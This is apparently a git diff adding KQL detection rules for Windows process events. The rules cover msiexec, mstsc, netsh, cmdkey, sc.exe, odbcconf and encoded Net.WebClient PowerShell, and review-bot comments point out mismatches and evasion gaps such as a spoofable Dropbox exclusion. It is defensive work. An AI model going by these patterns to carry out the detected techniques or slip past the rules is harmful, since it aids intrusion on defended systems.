+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.007
+// False Positives:
+// - WindowsApps installing updates via the quiet flag
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "-i" or ProcessCommandLine contains "/i" or ProcessCommandLine contains "–i" or ProcessCommandLine contains "—i" or ProcessCommandLine contains "―i" or ProcessCommandLine contains "-package" or ProcessCommandLine contains "/package" or ProcessCommandLine contains "–package" or ProcessCommandLine contains "—package" or ProcessCommandLine contains "―package" or ProcessCommandLine contains "-a" or ProcessCommandLine contains "/a" or ProcessCommandLine contains "–a" or ProcessCommandLine contains "—a" or ProcessCommandLine contains "―a" or ProcessCommandLine contains "-j" or ProcessCommandLine contains "/j" or ProcessCommandLine contains "–j" or ProcessCommandLine contains "—j" or ProcessCommandLine contains "―j") and (FolderPath endswith "\\msiexec.exe" or ProcessVersionInfoOriginalFileName =~ "msiexec.exe") and (ProcessCommandLine contains "-q" or ProcessCommandLine contains "/q" or ProcessCommandLine contains "–q" or ProcessCommandLine contains "—q" or ProcessCommandLine contains "―q")) and (not((((ProcessIntegrityLevel in~ ("System", "S-1-16-16384")) and InitiatingProcessFolderPath =~ "C:\\Windows\\CCM\\Ccm32BitLauncher.exe") or InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\" or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" and InitiatingProcessFolderPath startswith "C:\\Users\\"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/msiexec_web_install.kql b/KQL/rules/windows/process_creation/msiexec_web_install.kql
new file mode 100644
index 00000000..abc7506a
--- /dev/null
+++ b/KQL/rules/windows/process_creation/msiexec_web_install.kql
@@ -0,0 +1,12 @@
+// Title: MsiExec Web Install
+// Author: Florian Roth (Nextron Systems)
+// Date: 2018-02-09
+// Level: medium
+// Description: Detects suspicious msiexec process starts with web addresses as parameter
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.007, attack.command-and-control, attack.t1105
+// False Positives:
+// - False positives depend on scripts and administrative tools used in the monitored environment
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " msiexec" and ProcessCommandLine contains "://"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/mstsc_exe_execution_from_uncommon_parent.kql b/KQL/rules/windows/process_creation/mstsc_exe_execution_from_uncommon_parent.kql
new file mode 100644
index 00000000..2f6bda36
--- /dev/null
+++ b/KQL/rules/windows/process_creation/mstsc_exe_execution_from_uncommon_parent.kql
@@ -0,0 +1,12 @@
+// Title: Mstsc.EXE Execution From Uncommon Parent
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-04-18
+// Level: high
+// Description: Detects potential RDP connection via Mstsc using a local ".rdp" file located in suspicious locations.
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\mstsc.exe" or ProcessVersionInfoOriginalFileName =~ "mstsc.exe") and (InitiatingProcessFolderPath endswith "\\brave.exe" or InitiatingProcessFolderPath endswith "\\CCleanerBrowser.exe" or InitiatingProcessFolderPath endswith "\\chrome.exe" or InitiatingProcessFolderPath endswith "\\chromium.exe" or InitiatingProcessFolderPath endswith "\\firefox.exe" or InitiatingProcessFolderPath endswith "\\iexplore.exe" or InitiatingProcessFolderPath endswith "\\microsoftedge.exe" or InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\opera.exe" or InitiatingProcessFolderPath endswith "\\vivaldi.exe" or InitiatingProcessFolderPath endswith "\\whale.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/mstsc_exe_execution_with_local_rdp_file.kql b/KQL/rules/windows/process_creation/mstsc_exe_execution_with_local_rdp_file.kql
new file mode 100644
index 00000000..f8c8e76b
--- /dev/null
+++ b/KQL/rules/windows/process_creation/mstsc_exe_execution_with_local_rdp_file.kql
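Review bot: The `// Description:` line of the Mstsc.EXE Execution From Uncommon Parent rule describes a local ".rdp" file in suspicious locations, but the `| where` clause only tests that mstsc.exe was started by one of the listed browsers or outlook.exe and never inspects a path or the command line, so an analyst triaging the alert is pointed at the wrong evidence. A description that matches the logic would be `// Description: Detects mstsc.exe started by a web browser or Outlook, an uncommon parent for the RDP client that may indicate a downloaded or mailed ".rdp" file being opened directly.` Nearly the same sentence is the description of the following Mstsc.EXE Execution With Local RDP File rule, where it does fit the query; since these files are generated by helper.py, the wording presumably comes from the source rule and should be corrected upstream too.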
@@ -0,0 +1,12 @@
+// Title: Mstsc.EXE Execution With Local RDP File
+// Author: Nasreddine Bencherchali (Nextron Systems), Christopher Peacock @securepeacock
+// Date: 2023-04-18
+// Level: low
+// Description: Detects potential RDP connection via Mstsc using a local ".rdp" file
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+// - Likely with legitimate usage of ".rdp" files
+
+DeviceProcessEvents
+| where ((ProcessCommandLine endswith ".rdp" or ProcessCommandLine endswith ".rdp\"") and (FolderPath endswith "\\mstsc.exe" or ProcessVersionInfoOriginalFileName =~ "mstsc.exe")) and (not((ProcessCommandLine contains "C:\\ProgramData\\Microsoft\\WSL\\wslg.rdp" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\lxss\\wslhost.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/msxsl_exe_execution.kql b/KQL/rules/windows/process_creation/msxsl_exe_execution.kql
new file mode 100644
index 00000000..fdb921c9
--- /dev/null
+++ b/KQL/rules/windows/process_creation/msxsl_exe_execution.kql
@@ -0,0 +1,13 @@
+// Title: Msxsl.EXE Execution
+// Author: Timur Zinniatullin, oscd.community
+// Date: 2019-10-21
+// Level: medium
+// Description: Detects the execution of the MSXSL utility. This can be used to execute Extensible Stylesheet Language (XSL) files. These files are commonly used to describe the processing and rendering of data within XML files.
+// Adversaries can abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1220
+// False Positives:
+// - Msxsl is not installed by default and is deprecated, so unlikely on most systems.
+
+DeviceProcessEvents
+| where FolderPath endswith "\\msxsl.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/net_webclient_casing_anomalies.kql b/KQL/rules/windows/process_creation/net_webclient_casing_anomalies.kql
new file mode 100644
index 00000000..f63a8bc5
--- /dev/null
+++ b/KQL/rules/windows/process_creation/net_webclient_casing_anomalies.kql
@@ -0,0 +1,10 @@
+// Title: Net WebClient Casing Anomalies
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-05-24
+// Level: high
+// Description: Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. nEt.WEbCliEnT) string as used in obfuscation techniques
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "TgBlAFQALgB3AEUAQg" or ProcessCommandLine contains "4AZQBUAC4AdwBFAEIA" or ProcessCommandLine contains "OAGUAVAAuAHcARQBCA" or ProcessCommandLine contains "bgBFAHQALgB3AGUAYg" or ProcessCommandLine contains "4ARQB0AC4AdwBlAGIA" or ProcessCommandLine contains "uAEUAdAAuAHcAZQBiA" or ProcessCommandLine contains "TgBFAHQALgB3AGUAYg" or ProcessCommandLine contains "OAEUAdAAuAHcAZQBiA" or ProcessCommandLine contains "bgBlAFQALgB3AGUAYg" or ProcessCommandLine contains "4AZQBUAC4AdwBlAGIA" or ProcessCommandLine contains "uAGUAVAAuAHcAZQBiA" or ProcessCommandLine contains "TgBlAFQALgB3AGUAYg" or ProcessCommandLine contains "OAGUAVAAuAHcAZQBiA" or ProcessCommandLine contains "bgBFAFQALgB3AGUAYg" or ProcessCommandLine contains "4ARQBUAC4AdwBlAGIA" or ProcessCommandLine contains "uAEUAVAAuAHcAZQBiA" or ProcessCommandLine contains "bgBlAHQALgBXAGUAYg" or ProcessCommandLine contains "4AZQB0AC4AVwBlAGIA" or ProcessCommandLine contains "uAGUAdAAuAFcAZQBiA" or ProcessCommandLine contains "bgBFAHQALgBXAGUAYg" or ProcessCommandLine contains "4ARQB0AC4AVwBlAGIA" or ProcessCommandLine contains "uAEUAdAAuAFcAZQBiA" or ProcessCommandLine contains "TgBFAHQALgBXAGUAYg" or ProcessCommandLine contains "OAEUAdAAuAFcAZQBiA" or ProcessCommandLine contains "bgBlAFQALgBXAGUAYg" or ProcessCommandLine contains "4AZQBUAC4AVwBlAGIA" or ProcessCommandLine contains "uAGUAVAAuAFcAZQBiA" or ProcessCommandLine contains "TgBlAFQALgBXAGUAYg" or ProcessCommandLine contains "OAGUAVAAuAFcAZQBiA" or ProcessCommandLine contains "bgBFAFQALgBXAGUAYg" or 
ProcessCommandLine contains "4ARQBUAC4AVwBlAGIA" or ProcessCommandLine contains "uAEUAVAAuAFcAZQBiA" or ProcessCommandLine contains "bgBlAHQALgB3AEUAYg" or ProcessCommandLine contains "4AZQB0AC4AdwBFAGIA" or ProcessCommandLine contains "uAGUAdAAuAHcARQBiA" or ProcessCommandLine contains "TgBlAHQALgB3AEUAYg" or ProcessCommandLine contains "OAGUAdAAuAHcARQBiA" or ProcessCommandLine contains "bgBFAHQALgB3AEUAYg" or ProcessCommandLine contains "4ARQB0AC4AdwBFAGIA" or ProcessCommandLine contains "uAEUAdAAuAHcARQBiA" or ProcessCommandLine contains "TgBFAHQALgB3AEUAYg" or ProcessCommandLine contains "OAEUAdAAuAHcARQBiA" or ProcessCommandLine contains "bgBlAFQALgB3AEUAYg" or ProcessCommandLine contains "4AZQBUAC4AdwBFAGIA" or ProcessCommandLine contains "uAGUAVAAuAHcARQBiA" or ProcessCommandLine contains "TgBlAFQALgB3AEUAYg" or ProcessCommandLine contains "OAGUAVAAuAHcARQBiA" or ProcessCommandLine contains "bgBFAFQALgB3AEUAYg" or ProcessCommandLine contains "4ARQBUAC4AdwBFAGIA" or ProcessCommandLine contains "uAEUAVAAuAHcARQBiA" or ProcessCommandLine contains "TgBFAFQALgB3AEUAYg" or ProcessCommandLine contains "OAEUAVAAuAHcARQBiA" or ProcessCommandLine contains "bgBlAHQALgBXAEUAYg" or ProcessCommandLine contains "4AZQB0AC4AVwBFAGIA" or ProcessCommandLine contains "uAGUAdAAuAFcARQBiA" or ProcessCommandLine contains "TgBlAHQALgBXAEUAYg" or ProcessCommandLine contains "OAGUAdAAuAFcARQBiA" or ProcessCommandLine contains "bgBFAHQALgBXAEUAYg" or ProcessCommandLine contains "4ARQB0AC4AVwBFAGIA" or ProcessCommandLine contains "uAEUAdAAuAFcARQBiA" or ProcessCommandLine contains "TgBFAHQALgBXAEUAYg" or ProcessCommandLine contains "OAEUAdAAuAFcARQBiA" or ProcessCommandLine contains "bgBlAFQALgBXAEUAYg" or ProcessCommandLine contains "4AZQBUAC4AVwBFAGIA" or ProcessCommandLine contains "uAGUAVAAuAFcARQBiA" or ProcessCommandLine contains "TgBlAFQALgBXAEUAYg" or ProcessCommandLine contains "OAGUAVAAuAFcARQBiA" or ProcessCommandLine contains "bgBFAFQALgBXAEUAYg" or ProcessCommandLine 
contains "4ARQBUAC4AVwBFAGIA" or ProcessCommandLine contains "uAEUAVAAuAFcARQBiA" or ProcessCommandLine contains "TgBFAFQALgBXAEUAYg" or ProcessCommandLine contains "OAEUAVAAuAFcARQBiA" or ProcessCommandLine contains "bgBlAHQALgB3AGUAQg" or ProcessCommandLine contains "4AZQB0AC4AdwBlAEIA" or ProcessCommandLine contains "uAGUAdAAuAHcAZQBCA" or ProcessCommandLine contains "TgBlAHQALgB3AGUAQg" or ProcessCommandLine contains "OAGUAdAAuAHcAZQBCA" or ProcessCommandLine contains "bgBFAHQALgB3AGUAQg" or ProcessCommandLine contains "4ARQB0AC4AdwBlAEIA" or ProcessCommandLine contains "uAEUAdAAuAHcAZQBCA" or ProcessCommandLine contains "TgBFAHQALgB3AGUAQg" or ProcessCommandLine contains "OAEUAdAAuAHcAZQBCA" or ProcessCommandLine contains "bgBlAFQALgB3AGUAQg" or ProcessCommandLine contains "4AZQBUAC4AdwBlAEIA" or ProcessCommandLine contains "uAGUAVAAuAHcAZQBCA" or ProcessCommandLine contains "TgBlAFQALgB3AGUAQg" or ProcessCommandLine contains "OAGUAVAAuAHcAZQBCA" or ProcessCommandLine contains "bgBFAFQALgB3AGUAQg" or ProcessCommandLine contains "4ARQBUAC4AdwBlAEIA" or ProcessCommandLine contains "uAEUAVAAuAHcAZQBCA" or ProcessCommandLine contains "TgBFAFQALgB3AGUAQg" or ProcessCommandLine contains "OAEUAVAAuAHcAZQBCA" or ProcessCommandLine contains "bgBlAHQALgBXAGUAQg" or ProcessCommandLine contains "4AZQB0AC4AVwBlAEIA" or ProcessCommandLine contains "uAGUAdAAuAFcAZQBCA" or ProcessCommandLine contains "TgBlAHQALgBXAGUAQg" or ProcessCommandLine contains "OAGUAdAAuAFcAZQBCA" or ProcessCommandLine contains "bgBFAHQALgBXAGUAQg" or ProcessCommandLine contains "4ARQB0AC4AVwBlAEIA" or ProcessCommandLine contains "uAEUAdAAuAFcAZQBCA" or ProcessCommandLine contains "TgBFAHQALgBXAGUAQg" or ProcessCommandLine contains "OAEUAdAAuAFcAZQBCA" or ProcessCommandLine contains "bgBlAFQALgBXAGUAQg" or ProcessCommandLine contains "4AZQBUAC4AVwBlAEIA" or ProcessCommandLine contains "uAGUAVAAuAFcAZQBCA" or ProcessCommandLine contains "TgBlAFQALgBXAGUAQg" or ProcessCommandLine contains 
"OAGUAVAAuAFcAZQBCA" or ProcessCommandLine contains "bgBFAFQALgBXAGUAQg" or ProcessCommandLine contains "4ARQBUAC4AVwBlAEIA" or ProcessCommandLine contains "uAEUAVAAuAFcAZQBCA" or ProcessCommandLine contains "TgBFAFQALgBXAGUAQg" or ProcessCommandLine contains "OAEUAVAAuAFcAZQBCA" or ProcessCommandLine contains "bgBlAHQALgB3AEUAQg" or ProcessCommandLine contains "4AZQB0AC4AdwBFAEIA" or ProcessCommandLine contains "uAGUAdAAuAHcARQBCA" or ProcessCommandLine contains "TgBlAHQALgB3AEUAQg" or ProcessCommandLine contains "OAGUAdAAuAHcARQBCA" or ProcessCommandLine contains "bgBFAHQALgB3AEUAQg" or ProcessCommandLine contains "4ARQB0AC4AdwBFAEIA" or ProcessCommandLine contains "uAEUAdAAuAHcARQBCA" or ProcessCommandLine contains "TgBFAHQALgB3AEUAQg" or ProcessCommandLine contains "OAEUAdAAuAHcARQBCA" or ProcessCommandLine contains "bgBlAFQALgB3AEUAQg" or ProcessCommandLine contains "uAGUAVAAuAHcARQBCA" or ProcessCommandLine contains "bgBFAFQALgB3AEUAQg" or ProcessCommandLine contains "4ARQBUAC4AdwBFAEIA" or ProcessCommandLine contains "uAEUAVAAuAHcARQBCA" or ProcessCommandLine contains "TgBFAFQALgB3AEUAQg" or ProcessCommandLine contains "OAEUAVAAuAHcARQBCA" or ProcessCommandLine contains "TgBlAHQALgBXAEUAQg" or ProcessCommandLine contains "4AZQB0AC4AVwBFAEIA" or ProcessCommandLine contains "OAGUAdAAuAFcARQBCA" or ProcessCommandLine contains "bgBFAHQALgBXAEUAQg" or ProcessCommandLine contains "4ARQB0AC4AVwBFAEIA" or ProcessCommandLine contains "uAEUAdAAuAFcARQBCA" or ProcessCommandLine contains "TgBFAHQALgBXAEUAQg" or ProcessCommandLine contains "OAEUAdAAuAFcARQBCA" or ProcessCommandLine contains "bgBlAFQALgBXAEUAQg" or ProcessCommandLine contains "4AZQBUAC4AVwBFAEIA" or ProcessCommandLine contains "uAGUAVAAuAFcARQBCA" or ProcessCommandLine contains "TgBlAFQALgBXAEUAQg" or ProcessCommandLine contains "OAGUAVAAuAFcARQBCA" or ProcessCommandLine contains "bgBFAFQALgBXAEUAQg" or ProcessCommandLine contains "4ARQBUAC4AVwBFAEIA" or ProcessCommandLine contains "uAEUAVAAuAFcARQBCA") 
and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/netsh_allow_group_policy_on_microsoft_defender_firewall.kql b/KQL/rules/windows/process_creation/netsh_allow_group_policy_on_microsoft_defender_firewall.kql
new file mode 100644
index 00000000..bb50efd1
--- /dev/null
+++ b/KQL/rules/windows/process_creation/netsh_allow_group_policy_on_microsoft_defender_firewall.kql
@@ -0,0 +1,12 @@
+// Title: Netsh Allow Group Policy on Microsoft Defender Firewall
+// Author: frack113
+// Date: 2022-01-09
+// Level: medium
+// Description: Adversaries may modify system firewalls in order to bypass controls limiting network usage
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.004
+// False Positives:
+// - Legitimate administration activity
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "advfirewall" and ProcessCommandLine contains "firewall" and ProcessCommandLine contains "set" and ProcessCommandLine contains "rule" and ProcessCommandLine contains "group=" and ProcessCommandLine contains "new" and ProcessCommandLine contains "enable=Yes") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/network_reconnaissance_activity.kql b/KQL/rules/windows/process_creation/network_reconnaissance_activity.kql
new file mode 100644
index 00000000..b036cc04
--- /dev/null
+++ b/KQL/rules/windows/process_creation/network_reconnaissance_activity.kql
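Review bot: The PowerShell image check at the end of the `| where` is the cheap and selective part of this filter, yet it is evaluated as the last conjunct after well over a hundred `ProcessCommandLine contains` tests; putting it in its own `| where` ahead of the base64 chain (`| where (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")`, then the existing `contains` chain) keeps the scan to PowerShell events and makes the rule readable. The base64 tokens are case-sensitive by construction, so `contains_cs` is the precise operator and is cheaper than the case-insensitive `contains`; the converter is faithful to Sigma's case-insensitive default, but nothing in this rule depends on that. The hunk also has no `// False Positives:` section unlike the surrounding rules — worth checking whether the upstream rule declares any that the conversion dropped.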
@@ -0,0 +1,12 @@
+// Title: Network Reconnaissance Activity
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-02-07
+// Level: high
+// Description: Detects a set of suspicious network related commands often used in recon stages
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1087, attack.t1082, car.2016-03-001
+// False Positives:
+// - False positives depend on scripts and administrative tools used in the monitored environment
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "nslookup" and ProcessCommandLine contains "_ldap._tcp.dc._msdcs."
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/new_activescripteventconsumer_created_via_wmic_exe.kql b/KQL/rules/windows/process_creation/new_activescripteventconsumer_created_via_wmic_exe.kql
new file mode 100644
index 00000000..91e403ac
--- /dev/null
+++ b/KQL/rules/windows/process_creation/new_activescripteventconsumer_created_via_wmic_exe.kql
@@ -0,0 +1,12 @@
+// Title: New ActiveScriptEventConsumer Created Via Wmic.EXE
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-06-25
+// Level: high
+// Description: Detects WMIC executions in which an event consumer gets created. This could be used to establish persistence
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.003
+// False Positives:
+// - Legitimate software creating script event consumers
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "ActiveScriptEventConsumer" and ProcessCommandLine contains " CREATE "
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/new_capture_session_launched_via_dxcap_exe.kql b/KQL/rules/windows/process_creation/new_capture_session_launched_via_dxcap_exe.kql
new file mode 100644
index 00000000..c5279971
--- /dev/null
+++ b/KQL/rules/windows/process_creation/new_capture_session_launched_via_dxcap_exe.kql
@@ -0,0 +1,12 @@
+// Title: New Capture Session Launched Via DXCap.EXE
+// Author: Beyu Denis, oscd.community, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2019-10-26
+// Level: medium
+// Description: Detects the execution of "DXCap.EXE" with the "-c" flag, which allows a user to launch any arbitrary binary or windows package through DXCap itself. This can be abused to potentially bypass application whitelisting.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+// - Legitimate execution of dxcap.exe by legitimate user
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " -c " and (FolderPath endswith "\\DXCap.exe" or ProcessVersionInfoOriginalFileName =~ "DXCap.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/new_dll_registered_via_odbcconf_exe.kql b/KQL/rules/windows/process_creation/new_dll_registered_via_odbcconf_exe.kql
new file mode 100644
index 00000000..484f57b8
--- /dev/null
+++ b/KQL/rules/windows/process_creation/new_dll_registered_via_odbcconf_exe.kql
@@ -0,0 +1,12 @@
+// Title: New DLL Registered Via Odbcconf.EXE
+// Author: Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-22
+// Level: medium
+// Description: Detects execution of "odbcconf" with "REGSVR" in order to register a new DLL (equivalent to running regsvr32). Attackers abuse this to install and run malicious DLLs.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.008
+// False Positives:
+// - Legitimate DLLs being registered via "odbcconf" will generate false positives. Investigate the path of the DLL and its content to determine if the action is authorized.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "REGSVR " and ProcessCommandLine contains ".dll") and (FolderPath endswith "\\odbcconf.exe" or ProcessVersionInfoOriginalFileName =~ "odbcconf.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/new_dns_serverlevelplugindll_installed_via_dnscmd_exe.kql b/KQL/rules/windows/process_creation/new_dns_serverlevelplugindll_installed_via_dnscmd_exe.kql
new file mode 100644
index 00000000..b304067c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/new_dns_serverlevelplugindll_installed_via_dnscmd_exe.kql
@@ -0,0 +1,10 @@
+// Title: New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE
+// Author: Florian Roth (Nextron Systems)
+// Date: 2017-05-08
+// Level: high
+// Description: Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001, attack.t1112
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/config" and ProcessCommandLine contains "/serverlevelplugindll") and FolderPath endswith "\\dnscmd.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/new_firewall_rule_added_via_netsh_exe.kql b/KQL/rules/windows/process_creation/new_firewall_rule_added_via_netsh_exe.kql
new file mode 100644
index 00000000..1209e1c5
--- /dev/null
+++ b/KQL/rules/windows/process_creation/new_firewall_rule_added_via_netsh_exe.kql
@@ -0,0 +1,13 @@
+// Title: New Firewall Rule Added Via Netsh.EXE
+// Author: Markus Neis, Sander Wiebing
+// Date: 2019-01-29
+// Level: medium
+// Description: Detects the addition of a new rule to the Windows firewall via netsh
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.004, attack.s0246
+// False Positives:
+// - Legitimate administration activity
+// - Software installations
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " firewall " and ProcessCommandLine contains " add ") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe")) and (not(((ProcessCommandLine contains "advfirewall firewall add rule name=Dropbox dir=in action=allow \"program=" and ProcessCommandLine contains ":\\Program Files (x86)\\Dropbox\\Client\\Dropbox.exe\" enable=yes profile=Any") or (ProcessCommandLine contains "advfirewall firewall add rule name=Dropbox dir=in action=allow \"program=" and ProcessCommandLine contains ":\\Program Files\\Dropbox\\Client\\Dropbox.exe\" enable=yes profile=Any"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/new_generic_credentials_added_via_cmdkey_exe.kql b/KQL/rules/windows/process_creation/new_generic_credentials_added_via_cmdkey_exe.kql
new file mode 100644
index 00000000..7f104c2a
--- /dev/null
+++ b/KQL/rules/windows/process_creation/new_generic_credentials_added_via_cmdkey_exe.kql
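Review bot: The Dropbox exclusion inside `not(...)` is keyed only on command-line text, so anyone who can already run `netsh advfirewall firewall add rule` can suppress this rule by naming the rule `Dropbox` and pointing `program=` at the Dropbox client path, regardless of which process launched netsh. The sibling sc.exe rule in this diff scopes its Dropbox exclusion on `InitiatingProcessFolderPath`; the same anchor here would make the allow-list harder to abuse, e.g. adding `and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Dropbox\\Client\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Dropbox\\Client\\")` inside the exclusion, provided telemetry confirms the Dropbox client itself spawns that netsh call. Because this file is regenerated weekly, carry the change as an upstream fix or a post-conversion override rather than a hand edit.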
@@ -0,0 +1,13 @@
+// Title: New Generic Credentials Added Via Cmdkey.EXE
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-03
+// Level: medium
+// Description: Detects usage of "cmdkey.exe" to add generic credentials.
+// As an example, this can be used before connecting to an RDP session via command line interface.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.005
+// False Positives:
+// - Legitimate usage for administration purposes
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -g" or ProcessCommandLine contains " /g" or ProcessCommandLine contains " –g" or ProcessCommandLine contains " —g" or ProcessCommandLine contains " ―g") and (ProcessCommandLine contains " -p" or ProcessCommandLine contains " /p" or ProcessCommandLine contains " –p" or ProcessCommandLine contains " —p" or ProcessCommandLine contains " ―p") and (ProcessCommandLine contains " -u" or ProcessCommandLine contains " /u" or ProcessCommandLine contains " –u" or ProcessCommandLine contains " —u" or ProcessCommandLine contains " ―u") and (FolderPath endswith "\\cmdkey.exe" or ProcessVersionInfoOriginalFileName =~ "cmdkey.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/new_kernel_driver_via_sc_exe.kql b/KQL/rules/windows/process_creation/new_kernel_driver_via_sc_exe.kql
new file mode 100644
index 00000000..8d69c498
--- /dev/null
+++ b/KQL/rules/windows/process_creation/new_kernel_driver_via_sc_exe.kql
@@ -0,0 +1,12 @@
+// Title: New Kernel Driver Via SC.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-14
+// Level: medium
+// Description: Detects creation of a new service (kernel driver) with the type "kernel"
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1543.003
+// False Positives:
+// - Rare legitimate installation of kernel drivers via sc.exe
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "create" or ProcessCommandLine contains "config") and (ProcessCommandLine contains "binPath" and ProcessCommandLine contains "type" and ProcessCommandLine contains "kernel") and FolderPath endswith "\\sc.exe") and (not(((ProcessCommandLine contains "create netprotection_network_filter" and ProcessCommandLine contains "type= kernel start= " and ProcessCommandLine contains "binPath= System32\\drivers\\netprotection_network_filter" and ProcessCommandLine contains "DisplayName= netprotection_network_filter" and ProcessCommandLine contains "group= PNP_TDI tag= yes") or (ProcessCommandLine contains "create avelam binpath=C:\\Windows\\system32\\drivers\\avelam.sys" and ProcessCommandLine contains "type=kernel start=boot error=critical group=Early-Launch"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/new_network_trace_capture_started_via_netsh_exe.kql b/KQL/rules/windows/process_creation/new_network_trace_capture_started_via_netsh_exe.kql
new file mode 100644
index 00000000..95fb2310
--- /dev/null
+++ b/KQL/rules/windows/process_creation/new_network_trace_capture_started_via_netsh_exe.kql
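Review bot: The image check is `FolderPath endswith "\\sc.exe"` alone, with no `ProcessVersionInfoOriginalFileName` alternative, unlike the netsh, cmdkey and mstsc rules in this diff, so a renamed copy of sc.exe creating a `type= kernel` service is not caught. The fix is one clause: `and (FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe")`, and the sc.exe service-creation rule later in this diff has the same single-path check. The two exclusions (netprotection_network_filter and avelam) match on command-line text only, which is the same spoofable pattern as the other allow-lists here; probably acceptable at `Level: medium`, but a comment saying so would help the next reader. If the upstream Sigma rule uses only `Image`, the OriginalFileName alternative belongs there or in an override so regeneration keeps it.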
@@ -0,0 +1,12 @@
+// Title: New Network Trace Capture Started Via Netsh.EXE
+// Author: Kutepov Anton, oscd.community
+// Date: 2019-10-24
+// Level: medium
+// Description: Detects the execution of netsh with the "trace" flag in order to start a network capture
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.credential-access, attack.t1040
+// False Positives:
+// - Legitimate administration activity
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "trace" and ProcessCommandLine contains "start") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/new_port_forwarding_rule_added_via_netsh_exe.kql b/KQL/rules/windows/process_creation/new_port_forwarding_rule_added_via_netsh_exe.kql
new file mode 100644
index 00000000..60d05d82
--- /dev/null
+++ b/KQL/rules/windows/process_creation/new_port_forwarding_rule_added_via_netsh_exe.kql
@@ -0,0 +1,13 @@
+// Title: New Port Forwarding Rule Added Via Netsh.EXE
+// Author: Florian Roth (Nextron Systems), omkar72, oscd.community, Swachchhanda Shrawan Poudel
+// Date: 2019-01-29
+// Level: medium
+// Description: Detects the execution of netsh commands that configure a new port forwarding (PortProxy) rule
+// MITRE Tactic: Lateral Movement
